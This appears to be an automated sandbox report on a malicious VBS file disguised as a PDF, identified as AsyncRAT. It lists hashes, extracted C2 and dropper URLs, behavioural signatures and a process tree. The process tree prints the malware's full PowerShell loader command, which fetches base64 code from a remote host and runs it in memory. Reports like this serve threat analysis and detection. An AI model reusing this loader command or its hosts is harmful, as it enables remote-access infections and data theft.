Overview

overview

10

Static

static

TWEASOPKSA...DF.vbs

windows7-x64

10

TWEASOPKSA...DF.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/09/2022, 17:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TWEASOPKSA_002_PDF.vbs

  • Size

    238KB

  • MD5

    b757fcf7a0df8528178bf586a3d718ae

  • SHA1

    65394437dbbc8405b0a4b5c5e87bd1668f644d09

  • SHA256

    84f101fd1efbadf4f287849ae8dc6f09729f1741143b7465a4233599b9865624

  • SHA512

    908a583130bec368503d3a5ca62b7432d45910bc9adabd96da5310e38d5691a2c9bb9f71114c8a1270bf133d5324dec0afa819817fc85768d6c5cecaa9340119

  • SSDEEP

    48:sK0mjzlXJj5NzzBWsoMtssbs0Qs+PM/sq6OkZ9s3XEHDzzAA:sKDF9n0JMtswebE0DAsDoA

Score
10/10
asyncratdefaultrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://contadoreshbc.com/dll_startup

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

ehjay2022.duckdns.org:6739

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TWEASOPKSA_002_PDF.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('https://contadoreshbc.com/dll_startup'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('88b1f890dee4-f24b-d954-356b-7478a862=nekot&aidem=tla?txt.FDP_200_ASKPOSAEWT/o/moc.topsppa.b3638-fhwen/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Done.vbs
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4948
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4316

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    24cd57a8710ead89af77751cc4ce3236

    SHA1

    d66a76341ec9d1f53adc3caedfbc2a78e1055a30

    SHA256

    ca494d00a7aba63fc4cf7c49316bccee057616a26b917f9f12692b36b1f1dd91

    SHA512

    903577e4d3cd91d47dbd9f4f49c48236aef013c12ed36dc8a338c23845680b709af7e5272c21f036ea88c7b6ca10d090eb2cede1d836557d8ea37d071358223f

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    0305a7668f2e3675e1e22d509f88ed5a

    SHA1

    95bc70dc1ae5c795fcc4f9581de41ef4f83e0b4d

    SHA256

    9ab67c9ef2f57eaff6903d45c295716412ab4f87f656034c33389c648c89582d

    SHA512

    32155e5a7bb2a4faebf504eb399799765173671d9097c2e61bc789e1852235013de7f9efbfc107b686e21d0af01dca22083a5f3a8c477323eda7456daf209743

    Download Submit

  • memory/520-133-0x0000016E3B6F0000-0x0000016E3B712000-memory.dmp

    Filesize

    136KB

    Download

  • memory/520-134-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/520-142-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4316-138-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

    Download

  • memory/4316-143-0x0000000006080000-0x000000000611C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/4316-144-0x00000000066D0000-0x0000000006C74000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4316-145-0x0000000005DC0000-0x0000000005E26000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4948-137-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4948-136-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

    Filesize

    10.8MB

    Download